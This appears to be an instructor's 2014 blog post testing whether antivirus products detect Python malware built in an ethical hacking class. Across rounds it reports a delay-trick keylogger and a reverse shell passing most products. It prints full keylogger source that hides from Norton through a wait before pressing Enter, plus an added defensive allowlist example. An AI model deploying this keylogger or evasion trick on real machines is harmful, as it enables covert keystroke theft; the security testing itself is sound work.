Norton v. Python

I am trying to sneak attacks past Norton Antivirus using Python.

Directory

Round 1: Simple Listener -- NORTON WINS
Round 2: Simple Listener with Time Delay -- PYTHON WINS
Round 3: Reverse Shell -- PYTHON WINS
Round 4: Reverse Shell v. NOD32, Avast, and 360 Internet Security -- PYTHON WINS
Round 5: Reverse Shell v. McAfee and Kaspersky -- PYTHON WINS
Round 6: Reverse Shell v. F-Secure -- F-Secure WINS

Round 1: Simple Listener -- NORTON WINS!

I recently gave my Ethical Hacking students some homework projects in which they make malware in Python and compile it to Windows executables.

Antivirus Evasion with Python
Keylogger with Python

They both pass right through VirusTotal with 1 or 0 detections, so I was complaining on Twitter that antivirus was not working.

@NortonSupport responded on Twitter and said their full version, installed locally, would do better with heuristic detection.

They sent me to this link to get a 30-day trial version of Norton:

http://goo.gl/BPq4DN

So I installed that on a VM, let it update, and ran the malware with these results:

So Norton in actual use is a lot better than I thought--it does detect these attacks!

I appreciate the fast and very polite help I got from @NortonSupport, and I am now far more impressed with the efficacy of their product!

Round 2: Simple Listener with Time Delay -- PYTHON WINS

I posted the stuff above on Twitter, and then this happened:

So I modified my Python code to this:

import pythoncom, pyHook, sys, logging

x=raw_input("Press Enter to continue")

LOG_FILENAME = 'YOURNAME-keylog.txt'
def OnKeyboardEvent(event):
    logging.basicConfig(filename=LOG_FILENAME,
                        level=logging.DEBUG,
                        format='%(message)s')
    print "Key: ", chr(event.Ascii)
    logging.log(10,chr(event.Ascii))
    return True
hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()

Then I ran it in a console and waited 20 seconds before pressing Enter.

And it's true! Now Norton says nothing at all, even though the keylogger runs, stealing my stuff. Bad Norton, Bad Bad!

Round 3: Reverse Shell -- PYTHON WINS

I decided to try a more powerful attack: a reverse shell, using the same process.

This time no delay was required at all, and the same procedure worked for a two-stage attack.

When the target Windows box on the left runs the executable, it connects back to the Kali Linux C&C server and requests instructions.

I have local privileges on the box and it is under external control, and Norton Antivirus doesn't do anything about it--it just says "All Threats Resolved".

Bad Norton, Very Bad!

Round 4: Reverse Shell v. NOD32, Avast, and 360 Internet Security -- PYTHON WINS

Using the same reverse shell in the hacking lab on real Windows 7 machines (not virtual), with a virtual Kali Linux C&C server, all three antivirus products fail.

360 Internet Security Failing

Avast! Failing

ESET NOD32 Failing

Round 5: Reverse Shell v. McAfee and Kaspersky -- PYTHON WINS

Using the same reverse shell in the hacking lab on real Windows 7 machines (not virtual), with a virtual Kali Linux C&C server, both antivirus products fail.

McAfee AntiVirus Plus

Kaspersky Anti-Virus

Round 6: Reverse Shell v. F-Secure -- F-Secure WINS

Using the same reverse shell on a virtual Windows 7 machine, with a virtual Kali Linux C&C server, F-Secure's simple heuristics test works. This is a good idea--just block all unfamiliar code until it's approved--a simple form of whitelisting.

F-Secure INTERNET SECURITY 2014
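The "block all unfamiliar code until it's approved" idea from Round 6, as an added example that is not part of the original post and is not F-Secure's or any vendor's code: a default-deny execution gate in Python keyed on the SHA-256 of the file contents. All paths, labels and file bytes below are constructed. It shows why a content-hash allowlist, unlike a path or filename allowlist, treats a recompiled executable (such as a freshly rebuilt Python-to-EXE payload) as unfamiliar again.

```python
import hashlib
from datetime import datetime, timezone


class ExecutionGate:
    """Default-deny gate: a binary may run only if its exact contents were approved."""

    def __init__(self):
        self.approved = {}  # sha256 hex -> (label, approver, approved_at)
        self.pending = {}   # sha256 hex -> path where it was first seen

    @staticmethod
    def fingerprint(data: bytes) -> str:
        # Identity is the file content, never the name or path: renaming,
        # moving or recompiling a file changes the hash or leaves it alone,
        # and the decision follows the hash.
        return hashlib.sha256(data).hexdigest()

    def approve(self, data: bytes, label: str, approver: str) -> str:
        digest = self.fingerprint(data)
        self.approved[digest] = (label, approver, datetime.now(timezone.utc))
        self.pending.pop(digest, None)  # no longer waiting on a human
        return digest

    def decide(self, path: str, data: bytes) -> tuple:
        """Return (verdict, reason). Anything not explicitly approved is blocked."""
        digest = self.fingerprint(data)
        if digest in self.approved:
            return ("ALLOW", self.approved[digest][0])
        # Unknown code is blocked and queued for review; the gate never
        # tries to guess whether the code "looks" malicious, so a sleep
        # or other sandbox-evasion trick gains the binary nothing.
        self.pending.setdefault(digest, path)
        return ("BLOCK", "unknown binary, pending approval")


def demo() -> list:
    gate = ExecutionGate()
    tool_v1 = b"MZ-constructed-stand-in-for-an-approved-admin-tool"  # constructed
    gate.approve(tool_v1, "admin-tool.exe", "it-admin")
    return [
        gate.decide(r"C:\Tools\admin-tool.exe", tool_v1)[0],
        # same path and name, one byte different: a rebuilt EXE is unknown again
        gate.decide(r"C:\Tools\admin-tool.exe", tool_v1 + b"\x00")[0],
        gate.decide(r"C:\Users\test\Downloads\homework.exe", b"MZ-constructed-unknown")[0],
    ]


if __name__ == "__main__":
    print(demo())
```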


Posted 3:31 PM 3-20-14 by Sam Bowne
Round 2 added 4:03 pm 3-20-14
Round 3 added and directory added 11:15 am 3-24-14
Round 4 added 3-24-14 9:49 pm
Round 5 added 3-27-14 12:57 pm
Round 6 added 4-4-14 11:14 am